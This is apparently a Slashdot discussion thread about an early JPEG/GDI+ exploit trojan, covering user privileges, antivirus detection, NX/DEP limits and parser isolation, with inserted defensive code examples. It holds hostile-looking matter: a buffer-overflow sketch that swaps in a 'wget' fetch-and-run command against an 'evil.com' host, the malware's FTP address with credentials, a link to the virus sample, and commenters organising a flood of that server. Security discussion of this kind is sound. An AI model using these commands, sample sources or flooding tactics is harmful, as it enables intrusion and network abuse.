    This sort of thing ushers in a new era of exploitation in which the warnings of security professionals in the past have been proven dreadfully wrong. Only the bearded terminal hackers are invulnerable to this one, typing away at their command lines being all, "What JPGS?". No longer can we simply give advice on security based on our assumptions as to what is possible and what is not. We must pay the piper and actually consider attack vectors that have formerly not been feasible.

  7. The real question... by comwiz56 · · Score: 3, Interesting

    Does this affect Firefox?

  8. Well... by Pantero+Blanco · · Score: 4, Funny

    It was only a matter of time. Now we wait for a dozen variants to pop up.

    "This could possibly be the worst viruses yet!"

    Hm...maybe when he started typing there was only one and it spread during the sentence?

  9. Nothing's safe anymore by phantomAI · · Score: 4, Funny

    I guess those nude pictures of Anna Kournikova could indeed be a virus.

    1. Re:Nothing's safe anymore by bergeron76 · · Score: 4, Funny

      So does this qualify it as a Sexually Transmitted Disease (STD)?!?

      Drat!!!

      --
      Don't think that a small group of dedicated individuals can't change the world. It's the only thing that ever has.
  10. Fantastic by lukewarmfusion · · Score: 2, Insightful

    Virus writers should be dragged out in the street and... well, whatever.

    The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.

    I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.

    1. Re:Fantastic by Nurgled · · Score: 2, Insightful

      This latest vulnerability is more like having an adequate lock but a burglar coming in through a vulnerability in your couch. No-one considered the security implications of the couch, because no-one expected the couch to be a point of entry.

  11. I don't see why this is a problem by bconway · · Score: 4, Insightful

    If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

    --
    Interested in open source engine management for your Subaru?
    1. Re:I don't see why this is a problem by gl4ss · · Score: 4, Informative

      why is it a problem? because people do run with admin privileges.

      I hate to break it to you but normal people don't know or care about things like that.

      --
      world was created 5 seconds before this post as it is.
    2. Re:I don't see why this is a problem by rufo · · Score: 4, Insightful

      Yeah, that's all well and good - except for the fact that Windows sets up users by default as administrators, as does every OEM to ship a Windows PC, and without any explanation as to why this is or why it might just be a bad idea.

      Until Microsoft stops shipping the OS wide-open for anyone to do anything they want, these kinds of attacks will continue. Apple's gotten it much more right in this regard - even as a Mac user I don't think Mac OS X is particularly more secure than any other *nix or even Windows (just less analyzed), but at least Apple doesn't ship with any services turned on or allow admin users willy-nilly access over the entire system (most admin settings and files require password confirmation before continuing - not foolproof by any means but a huge step in the right direction), as do most good Unices these days.

      But of course not Windows. ;-)

      --
      My English teacher once told me that two positives don't make a negative. Two words for her: Yeah, right.
    3. Re:I don't see why this is a problem by real_smiff · · Score: 2, Interesting
      she must have had Admin access to make herself an admin, no?

      i manage systems with limited user accounts perfectly fine. just about all software works as well, office apps, multimedia, games, communications - it's not as bad as people make out. stuff that doesn't work - people don't get to play! (evil grin ;) also be sure to complain to the makers, it's the only way to improve this.

      --

      This is my Sig, this is my Gun. One is for Slashdot and one is for Fun.

    4. Re:I don't see why this is a problem by Etcetera · · Score: 4, Interesting

      At the risk of being kicked off Slashdot for being a devil's advocate... ;)

      If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

      Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

      Think bigger. Think to the future. "Don't log in as root/Don't be an administrator." is NOT an answer. Mac OS 9 and below operated by default in a single-user mode without *any* authentication necessary to make changes and I can list the successful viruses/exploits (especially remote exploits) by hand on a single sheet of paper.

      Artificial permission models (where "artificial" means "not needed by the environment") are not panaceas and aren't excuses for poor OS design.
    5. Re:I don't see why this is a problem by real_smiff · · Score: 2, Insightful

      interesting post, but: a lot of the reason to run a system with limited accounts is to prevent certain *users* doing things *you* don't want. not things that are 'definitely wrong', like installing viruses, just things you don't want in your organisation. how is your better security model/OS design ever going to prevent that? i guess on a single user system what you're saying could make good sense?

      --

      This is my Sig, this is my Gun. One is for Slashdot and one is for Fun.

    6. Re:I don't see why this is a problem by Waffle+Iron · · Score: 5, Informative
      If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

      It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

    7. Re:I don't see why this is a problem by HuguesT · · Score: 4, Insightful

      All well and good but many things don't work in windows if you are not an administrator.

      I find it incredible that reputable developers like ID software for example require the latest demo of Doom 3 to be *installed* AND *run* as an administrator. The demo readme states this explicitly.

      Yes I do know about "Run As" but what are these people thinking? Administrator is for administrative tasks, not for playing games.

      No wonder XP is such a debacle area security wise.

    8. Re:I don't see why this is a problem by JoeBuck · · Score: 3, Insightful

      We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator. The reason is that the games were written in the Windows 95 era; they want to do direct access to everything, and that takes privileges that a non-admin Windows XP user does not have.

      This kind of thing is common, and it forces a lot of people to run with elevated privilege. This is the price of legacy. Of course, Microsoft could have provided some mechanism to run the older programs without privilege (say, with some kind of virtual machine setup), but they probably figured that if they didn't do the work, it would be easier to sell new XP versions of all the apps.

    9. Re:I don't see why this is a problem by jpop32 · · Score: 3, Informative

      We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator.

      As a producer of children computer games, I have encountered those problems. Most are solved by a couple of registry/security policy edits. Try enabling 'Restrict CD-ROM Access to locally logged-on user only' in Local Security Policy (found in administrative tools). That should cure a lot of them.

      Careful assignment of permissions to certain files/directories would probably take care of others. Check out www.sysinternals.com for tools which can help you track down what the program is trying to open and what it fails to do.

    10. Re:I don't see why this is a problem by Nurgled · · Score: 2, Informative

      Much like on a Linux system, a limited user can just shove executables in his or her "home directory" and run them from there. The main thing making this hard right now is that it's very hard to get most applications not wrapped in an "installer" which tries to write DLLs all over the filesystem regardless of what directory you choose to install.

      Windows XP "logo-compliant" installers will offer admin users the choice to install for "All Users" (put it in a publically-readable directory) or "Just Me", in which case much of it should end up in the admin's home directory. Limited users can install for "Just Me" only. This is much like me downloading a source tarball on a UNIX system and running ./configure --prefix=/home/nurgled/appdir.

    11. Re:I don't see why this is a problem by CheechBG · · Score: 4, Informative

      I don't know about you, but I don't want to have to use the Run As command every 15 minutes just to do something simple like burn a CD (need Admin privs) or run a game. This is my PC, I administrate it, so I run with Admin privileges. As such, it then becomes MY responsibility to make sure that bullshit stuff doesn't find its way over. This is why I bother to run an AV program, have Spybot tell me whenever something is trying to write to the registry, and so on.

      At work, however, is a different story. I do have domain access, but I never log in as the domain admin unless I need to do some administration. I did, however, grant myself local admin rights on my machine for the same reasons above. I don't have a problem with spyware, adware, viruses, or anything.

    12. Re:I don't see why this is a problem by jermz · · Score: 2, Insightful
      Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

      This is a bad attitude to take. You might be the only user on your machine now, but when you allow a trojan on that downloads and installs remote-control software on your computer, you are not the only user anymore. In the current state of the Internet, you are being irresponsible if you think you are the only one using your computer. It sucks, yes, but it's the truth.

      It's like the old saying about VD. Once you sleep with someone, it's like sleeping with everyone they have slept with, ad infinitum. If you do not take the steps to protect your computer, you are not only exposing yourself to the dangers of the Internet, but your machine can then become a vector itself. Think about that.

      BTW, greets from another rohan user. I went to SDSU back in '94. rohan was the first Unix box I ever had an account on. Lots of fond memories there.

      Jeremy

      --
      Hi-Technical Excellent Taste and Flavor!
  12. clamav and nav detect it by Indy1 · · Score: 4, Informative

    clamscan possibleVirus.jpg
    possibleVirus.jpg: Exploit.JPEG.Comment FOUND

    ----------- SCAN SUMMARY -----------
    Known viruses: 24607
    Scanned directories: 0
    Scanned files: 1
    Infected files: 1
    Data scanned: 0.00 MB
    I/O buffer size: 131072 bytes
    Time: 0.501 sec (0 m 0 s)

    also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
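
Added example, not from the post above and not any vendor's scanner: the structural check behind a signature like Exploit.JPEG.Comment. Every JPEG marker segment carries a two-byte length field that counts itself, so a legal COM (0xFFFE) segment is never shorter than 2; the MS04-028 overrun was reached through a comment whose length field says 0 or 1, which makes the decoder's "length minus 2" wrap to a huge value. The sample byte strings are constructed here; the walker stops at SOS, so it inspects header segments only and says nothing about what a comment contains.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum jpeg_verdict {
    JPEG_OK = 0,
    JPEG_NOT_JPEG,            /* no SOI, or marker sync lost */
    JPEG_TRUNCATED,           /* a segment claims more bytes than remain */
    JPEG_BAD_SEGMENT_LENGTH,  /* some segment's length field is below 2 */
    JPEG_BAD_COM_LENGTH       /* a COM segment's length field is 0 or 1 */
};

/* Walk the marker segments that precede the entropy-coded data. Each length
 * field counts its own two bytes, so anything below 2 is invalid and the
 * value a decoder computes as "length - 2" wraps in unsigned arithmetic. */
enum jpeg_verdict scan_jpeg_markers(const uint8_t *buf, size_t len)
{
    size_t pos;

    if (len < 2 || buf[0] != 0xFF || buf[1] != 0xD8)   /* SOI */
        return JPEG_NOT_JPEG;
    pos = 2;

    while (pos < len) {
        uint8_t marker;
        unsigned seglen;

        if (buf[pos] != 0xFF)
            return JPEG_NOT_JPEG;
        while (pos < len && buf[pos] == 0xFF)          /* 0xFF fill bytes are allowed */
            pos++;
        if (pos >= len)
            return JPEG_TRUNCATED;
        marker = buf[pos++];

        if (marker == 0xD9 || marker == 0xDA)          /* EOI, or SOS: header segments are over */
            return JPEG_OK;
        if (marker == 0x01 || (marker >= 0xD0 && marker <= 0xD8))
            continue;                                  /* standalone markers carry no length */

        if (pos + 2 > len)
            return JPEG_TRUNCATED;
        seglen = ((unsigned)buf[pos] << 8) | buf[pos + 1];
        if (seglen < 2)
            return marker == 0xFE ? JPEG_BAD_COM_LENGTH : JPEG_BAD_SEGMENT_LENGTH;
        if (seglen > len - pos)
            return JPEG_TRUNCATED;
        pos += seglen;                                 /* length includes its own two bytes */
    }
    return JPEG_TRUNCATED;                             /* ran out of bytes before EOI */
}

/* Constructed samples: a minimal JFIF file with a 5-byte comment, a file whose
 * comment length field says 1, and a file cut off in the middle of a segment. */
const uint8_t sample_clean[] = {
    0xFF, 0xD8,
    0xFF, 0xE0, 0x00, 0x10, 'J', 'F', 'I', 'F', 0x00, 0x01, 0x01, 0x00,
    0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
    0xFF, 0xFE, 0x00, 0x07, 'h', 'e', 'l', 'l', 'o',
    0xFF, 0xD9
};
const uint8_t sample_bad_comment[] = { 0xFF, 0xD8, 0xFF, 0xFE, 0x00, 0x01, 0xFF, 0xD9 };
const uint8_t sample_truncated[]   = { 0xFF, 0xD8, 0xFF, 0xFE, 0x00, 0x40, 'a' };

int main(void)
{
    static const char *names[] = { "ok", "not a jpeg", "truncated",
                                   "bad segment length", "bad COM length" };
    printf("clean:       %s\n", names[scan_jpeg_markers(sample_clean, sizeof sample_clean)]);
    printf("bad comment: %s\n", names[scan_jpeg_markers(sample_bad_comment, sizeof sample_bad_comment)]);
    printf("truncated:   %s\n", names[scan_jpeg_markers(sample_truncated, sizeof sample_truncated)]);
    return 0;
}
```

A scanner that stops at the first bad length is enough to reject the file; it is not a replacement for a patched gdiplus.dll, because other decoders may be reachable through other paths.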
  13. Imagine for a moment.... by Hardwyred · · Score: 4, Interesting

    your neighbors open accesspoint, a copy of Airpwn and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.

    --
    www.linux-skunkworks.com
  14. Screenshots... by tajmorton · · Score: 5, Funny

    No Screenshots, please!

    --
    Tell the truth and you won't have so much to remember.
  15. Re:Hello by borl · · Score: 2, Funny

    No, just a backdoor.

  16. alt.binaries.erotica.beanie-babies by drachenfyre · · Score: 5, Funny

    Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.

    1. Re:alt.binaries.erotica.beanie-babies by Anonymous Coward · · Score: 4, Funny

      I take offence at your narrow-mindedness.

    2. Re:alt.binaries.erotica.beanie-babies by marko123 · · Score: 4, Funny

      Were you around during the height of the popularity of alt.tasteless.hamster.duct_tape or alt.swedish.chef.bork.bork.bork?

      Those were the days. Anyone go to Level 17 on gopher?

      --
      http://pcblues.com - Digits and Wood
  17. Eek! by StevenHenderson · · Score: 4, Funny
    This could possibly be the worst viruses yet!

    These could be the worst grammar too!!!

  18. Not particularly well coded by crazyray · · Score: 4, Interesting

    If you read through the actual posting, it is apparent that while this may be the first GDI/JPEG-based worm, it is certainly not going to be the worst. First of all, unless I missed it, this code does not even self-replicate (i.e. it doesn't mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems). I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then **THAT** will be a nasty worm.

    1. Re:Not particularly well coded by Leomania · · Score: 2, Interesting

      Considering how many people are affected by malware loaded by visiting/loading code from a malicious (or hacked) website, I would expect this to spread relatively quickly once the exploit is propagated around all over the net.

      I saw one post indicating that the anti-virus tools can pick it up, but can they do so when you visit a website? My guess is no, and as such the majority of people who don't update their systems regularly (most people) have a pretty high likelihood of coming across such a site sooner rather than later as a result.

      - Leo

      --
      You don't use science to show that you're right, you use science to become right.
    2. Re:Not particularly well coded by djeca · · Score: 5, Insightful

      Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...

  19. The answer is... by Leomania · · Score: 5, Informative

    yes, if you haven't updated to the latest version.

    See this Slashdot thread.

    - Leo

    --
    You don't use science to show that you're right, you use science to become right.
    1. Re:The answer is... by Leomania · · Score: 4, Informative

      Sorry, that should be "yes to a similar vulnerability, but not to this exact one, unless you've upgraded to the newest version."

      Must hit "Preview" to check those links, not "Submit"...

      - Leo

      --
      You don't use science to show that you're right, you use science to become right.
  20. Even more evil ... by gregoryl · · Score: 4, Funny

    put the image on doubleclick.net

    1. Re:Even more evil ... by TCM · · Score: 2, Insightful
      ^(.*\.)?doubleclick\.(com|net)$
      is blocked here anyway..
      --
      Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
  21. WAV files by mosel-saar-ruwer · · Score: 3, Interesting
    Last weekend, I was messing around with writing my own WAV files [in conjunction with a LabVIEW project], and, oddly enough, M$FT's wmplayer.exe was the ONLY media player that checked the file for integrity.

    Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.

    I bet this sort of thing is a helluva lot more endemic than people realize.

  22. DOS it now? by real_smiff · · Score: 2, Interesting
    it connects to ftp://209.171.43.27/www/system/ u/p bawz/pagdba

    apparently, the text indicates, that's the only source for the installed files.

    if say, 500 of us were to log into that and stay connected, would we stop the virus? would there be any risk to ourselves? (giving your IP away for a start).

    --

    This is my Sig, this is my Gun. One is for Slashdot and one is for Fun.

  23. The joys of keeping a campus virus-free by iamlucky13 · · Score: 5, Interesting

    Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing plenty of guys asking for help getting this removed, after finding out pornstars aren't virus free after all.

    Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket license of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from building to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

    1. Re:The joys of keeping a campus virus-free by pigscanfly.ca · · Score: 2, Interesting

      I know what you mean. I'm an RCC (resnet computer consultant) at Waterloo and we provided everyone with simple step by step guides to install Norton and turn their firewall on, yet we disconnected over 10% of people for getting infected with a worm which the default Windows firewall stops.
      Add to our luck that Norton doesn't detect the worm and we have a computing experience which reminds people of the old BBS days.
      Let's just say I don't wear my nametag except when required to :-)

    2. Re:The joys of keeping a campus virus-free by Agilis · · Score: 2, Informative

      The campus Resnet I'm on right now is just as bad if not worse, and we're sitting on an OC-3 here (though it's only 10Mbps and what seems to be Cat3 to most dorms. Yes, you heard me - we need special cables that are RJ-11 on one end and RJ-45 on the other)

      Once 3 years ago as a freshman, I left my XP share open to those default Shared folders for 10 minutes and had about 30-50 copies of nimda flood in. Norton went berserk with warnings before I closed the sharing.

      And 2 years ago the fiber switches literally got overloaded from traffic from sasser et al. It still happens from time to time. It's a wonder we've got continuous connections for more than a few hours.

      Policy changed after sasser requiring all machines to be patched to a certain point before registering into the resnet system. It's still at WinXP SP1 right now with no signs of requiring SP2 or updating once your MAC's registered.

      The only amusing part to this long story is that we knock our network down long before anyone can use our pipe to knock someone else off.

    3. Re:The joys of keeping a campus virus-free by DannyiMac · · Score: 3, Interesting

      I work for the University of Kentucky ResNet and when a student's computer appears to exhibit viral activity they will be blocked by their IP address by the Communications department. Then the student calls and we check if the IP is blocked or not. If they are, we send them to the anti-virus web page--the only web page the student can access from their computer. Once they install the virus software the university supplies, remove the virus(es), and upgrade to the latest service pack for their version of Windows 2000/XP, we unblock them. If they lie to us and don't do this they simply get blocked again. This is how UK controls its virus problem and I think it's a good method. Students also get blocked for other reasons as well, such as port scanning for its possible virus behavior. Lastly, a DMCA complaint, where the student gets caught sharing copyrighted materials by organizations outside of UK (I don't think the RIAA has gotten anyone on campus yet, however).

      --
      - Danny
  24. Why thanks! by ufpdom · · Score: 2, Informative

    Now i can go exploiting people! Thx for the virus easynews! http://easynews.com/virus/virus-jpeg.zip

    --
    There's no Freedom like UFP-dom
  25. Self fulfilling prophecy anyone? by PoderOmega · · Score: 2, Interesting

    Come on... admit it you've all been dying for this slashdot posting. You didn't think all this hype about the microsoft GDI thing wasn't going to pay off? Well there you go.... feast on microsofts pain....

  26. Limited Accounts? by WoTG · · Score: 3, Interesting

    Anyone know if this exploit can be done when the user is using a Windows Limited account?

    1. Re:Limited Accounts? by mtnharo · · Score: 3, Informative

      From the sound of things, the exploit will be triggered, but this particular piece of code won't be able to do much, since it tries to install software that requires an Admin level account. Having a limited account won't prevent the user from running the exploit code, but it does prevent the exploit from leading to a system-level breach, unless some sort of privilege-escalation exploit is included as well.

  27. Microsoft Patch by bcreane · · Score: 5, Informative

    FYI, here's the fix from M$ for this exploit: Security Bulletin

  28. We ARE DDOS'ing it now by DigitalRaptor · · Score: 2, Informative

    It is very hard to get in right now. I've set FlashFXP to retry 1,000 times every 15 seconds. We'll see how that goes.

    The more of us that keep this connection tied up doing innocent things for the next 48 hours, the better.

    There really needs to be a distributed DDOS for spammer sites, virus sites, etc. Use The Force for good, I say.

    --
    Lose Weight and Feel Great with Isagenix
  29. God dammit! by Anonymous Coward · · Score: 5, Funny

    Why doesn't slashdot allow you to post images! :)

    1. Re:God dammit! by Dorothy+86 · · Score: 3, Funny
      because those of us who have remained goatse free would like to keep it that way :-P

      (yes, I know you're being silly, but what the hell :))

  30. Re:RUN ZONEALARM! by AndrewStephens · · Score: 2, Interesting

    That will help in this case, because the malicious code downloads other programs, but what if the code just looks for JPGs on your local drive to modify. Pictures get emailed around so often these days that the virus would still spread at a decent rate.
    The code could also contain its own backdoor software, IRC client, etc. Remember with a buffer overflow the code is executing in another program that already has rights to the network, so personal firewalls don't help.

    --
    sheep.horse - does not contain information on sheep or horses.
  31. Re:Stop downloading porn? by base3 · · Score: 4, Funny

    Stop being a tease and saying we can't have pr0n and then using language like "patches the hole." Thank you.

    --
    One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
  32. NX Protection? by rsmith-mac · · Score: 5, Interesting

    Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.

    1. Re:NX Protection? by Anonymous Coward · · Score: 5, Informative
      I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:
      #include <stdlib.h>
      #include <string.h>

      char overflowed[10];
      /* assumed to sit right after 'overflowed' in memory */
      char command[] = "echo \"some silly command\"";

      int main(int argc, char **argv){
          if (argc < 2) return 1;
          strcpy(overflowed, argv[1]);   /* unchecked copy: the overflow */
          system(command);               /* runs whatever 'command' holds now */
      }
      We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.
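
Added example, not the poster's code: the same scenario written so it can be run without handing anything to a shell. The two buffers are placed in one struct so that their adjacency is guaranteed (for two separate globals, as in the snippet above, the linker makes no such promise), the copy is unchecked, and the function returns the string that would have gone to system(). The inputs are constructed; nothing is executed, which is the point of the post: the attacker only had to change data, never to run any.

```c
#include <stdio.h>
#include <string.h>

/* The two buffers from the post, placed in one struct so that 'command'
 * really does follow 'overflowed' in memory. */
struct frame {
    char overflowed[10];
    char command[64];
};

/* strcpy semantics written out by hand, so a fortified libc strcpy does
 * not abort the demonstration. This unchecked copy is the bug. */
static void unsafe_copy(char *dst, const char *src)
{
    while ((*dst++ = *src++) != '\0')
        ;
}

/* Copy 'input' into the 10-byte buffer and return the string the program
 * would then hand to system(). Nothing is executed here. */
const char *command_after_copy(const char *input, struct frame *f)
{
    memset(f, 0, sizeof *f);
    strcpy(f->command, "echo \"some silly command\"");
    unsafe_copy(f->overflowed, input);          /* bytes past the 10th land in f->command */
    f->command[sizeof f->command - 1] = '\0';   /* keep the return value a string */
    return f->command;
}

struct frame demo_frame;

int main(void)
{
    /* constructed inputs: a short name, then 10 bytes of padding followed by a replacement command */
    printf("benign: %s\n", command_after_copy("hello", &demo_frame));
    printf("attack: %s\n", command_after_copy("AAAAAAAAAAid > /tmp/pwned", &demo_frame));
    return 0;
}
```

No data page is ever executed, so NX/DEP has nothing to object to; only a bounds check on the copy, or a canary between the buffers, would have stopped it.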
  33. Sex! by InfiniteWisdom · · Score: 4, Funny

    What, now you can't even WATCH sex without protection?

  34. Lament from an old-timer by bigberk · · Score: 4, Interesting

    In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.

    In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.

    Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?

    i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.
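
One way to do what the post asks for, as an added example (not Windows' or any vendor's shipping design) on a POSIX system: the untrusted decoder runs in a forked child that talks to the caller over pipes only and drops to an unprivileged uid when started as root. The decoder here is a stand-in that sums bytes and deliberately crashes on a constructed "malformed" input, so what the run shows is a crash in the child being reported to the parent as a failed parse instead of taking the parent down. The uid/gid 65534 and the crash trigger are assumptions of the demo, and the data is handed over by copying, which is exactly the cost of this design.

```c
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for an untrusted decoder: sums the bytes. A leading 0xFF byte
 * is the constructed "malformed input" that makes the parser crash. */
static int toy_parse(const unsigned char *data, size_t len)
{
    int sum = 0;
    if (len > 0 && data[0] == 0xFF)
        abort();                                  /* simulated memory-corruption crash */
    for (size_t i = 0; i < len; i++)
        sum += data[i];
    return sum;
}

/* Run toy_parse() in a forked child that talks to us over pipes only.
 * Returns the parsed value, or -1 if the child crashed or misbehaved.
 * The caller's process survives either way. */
int parse_isolated(const unsigned char *data, size_t len)
{
    int to_child[2], from_child[2], value, status, result = -1;
    pid_t pid;

    signal(SIGPIPE, SIG_IGN);      /* a dead child must not kill us through the pipe */
    fflush(stdout);                /* don't duplicate buffered output into the child */
    if (pipe(to_child) != 0 || pipe(from_child) != 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;

    if (pid == 0) {                /* child: the jail */
        unsigned char buf[4096];
        ssize_t n;
        close(to_child[1]);
        close(from_child[0]);
        /* assumed unprivileged uid/gid 65534 ("nobody") when started as root */
        if (getuid() == 0 && (setgid(65534) != 0 || setuid(65534) != 0))
            _exit(2);
        n = read(to_child[0], buf, sizeof buf);
        if (n < 0)
            _exit(2);
        value = toy_parse(buf, (size_t)n);
        if (write(from_child[1], &value, sizeof value) != (ssize_t)sizeof value)
            _exit(2);
        _exit(0);
    }

    /* parent: hand over a copy of the data, collect the answer, reap the child */
    close(to_child[0]);
    close(from_child[1]);
    if (write(to_child[1], data, len) == (ssize_t)len) {
        close(to_child[1]);
        if (read(from_child[0], &value, sizeof value) == (ssize_t)sizeof value)
            result = value;
    } else {
        close(to_child[1]);
    }
    close(from_child[0]);
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;                 /* killed by a signal (here SIGABRT) or failed: report, don't crash */
    return result;
}

/* constructed inputs: a clean one and the crash trigger */
const unsigned char demo_good[] = { 'a', 'b', 'c' };
const unsigned char demo_bad[]  = { 0xFF, 'a', 'b' };

int main(void)
{
    printf("good input: %d\n", parse_isolated(demo_good, sizeof demo_good));
    printf("bad input:  %d (parent still running)\n", parse_isolated(demo_bad, sizeof demo_bad));
    return 0;
}
```

The child still shares the parent's uid unless the caller is root, so on a real system the jail would add a chroot or seccomp filter on top; the process boundary alone already turns a code-execution bug in the decoder into a failed parse plus whatever the child's credentials allow.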

    1. Re:Lament from an old-timer by IchBinEinPenguin · · Score: 2, Insightful

      ... would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself ...

      Remember, this was a LEGAL decision, not a TECHNICAL one.

      Killing NS without all those messy anti-trust problems required IE to become part of the OS.

      From a technical standpoint it was a moronic idea, as a lot of people said at the time.

    2. Re:Lament from an old-timer by bastard42 · · Score: 2, Interesting

      i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket?

      No. It's slow.
      You have to copy the data back and forth. Not only that, you double your memory for that "operation" (sender has a copy and receiver has a copy).

      OTOH, it's a cool abstraction, and it's called pipes. All programs should pass data as file. Your file can be a pipe. Sockets are named pipes. GUI and speed be damned.


      P.S. I still think plan9 is supercool.

  35. Crappy MS "GDI Detection Tool" by whoever57 · · Score: 3, Interesting

    I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the office update page. Guess what: the office update page said there were no updates. So, apparently the system is vulnerable, but there is no way to fix it. Wonderful!

    --
    The real "Libtards" are the Libertarians!
    1. Re:Crappy MS "GDI Detection Tool" by ceeam · · Score: 2, Insightful

      Let me guess - do you perchance use one of the "blacklisted" serialz for your office registration? If not then sorry, but if so - take note that WindowsUpdate verifies your reg number and feels free to behave accordingly.

  36. This'll be good for catching downloaders . . . by base3 · · Score: 3, Interesting

    . . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .

    --
    One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
    1. Re:This'll be good for catching downloaders . . . by dpete4552 · · Score: 2, Insightful

      If the FBI is allowed to trade drugs to get to drug dealers then I'm pretty sure they're allowed to trade kiddie porn pics to get to pervs.

      --
      http://www.archive.org/details/ThePowerOfNightmares
    2. Re:This'll be good for catching downloaders . . . by base3 · · Score: 2, Interesting
      2. The infected JPEG is a legal photo, in which case the "alleged perv" has broken no law, and there is no basis for the warrant.

      What if it's titled as kiddy porn, but it's not--just bait to see who's viewing it? Sure, then the "alleged perv" hasn't committed a crime by downloading and viewing it, but the fact that s/he has might just be enough probable cause for a sealed Grand Jury indictment, followed by a warrant for an unannounced full search of the downloader's PC . . . (IANAL, especially NA criminal L).

      --
      One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
    3. Re:This'll be good for catching downloaders . . . by ceeam · · Score: 3, Insightful

      Well - how many people viewed the certain hello.jpg image willingly and knowing what they are going to find? How difficult it would be for me to dupe you or someone else to load the image you mention if I find its URL?

  37. Is it named yet? by jaysones · · Score: 2, Funny

    If there's no name yet, how about the Medusa virus?

  38. Hacked CNN Advertisments by 8400_RPM · · Score: 5, Insightful

    So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

    Millions of instant zombies.

    That's f*cking scary....

    1. Re:Hacked CNN Advertisments by Wes+Janson · · Score: 3, Informative

      If I understood the article correctly, you have to actually save the virus file, and then try to view it. Only then will it infect. From what I read, it would seem just opening a webpage with the "image" on it would not infect a computer.

    2. Re:Hacked CNN Advertisments by Pecisk · · Score: 2, Insightful

      It actually doesn't make sense because browsing the web is...just saving pages/pictures/etc in cache AND viewing them. So I guess there wouldn't be any kind of difference if you save it.

      Only difference is then when different libs are used for viewing JPG.

      --
      user@ubuntubox:~$ stfu This server is going down for shutdown NOW!
    3. Re:Hacked CNN Advertisments by SvendTofte · · Score: 2, Insightful

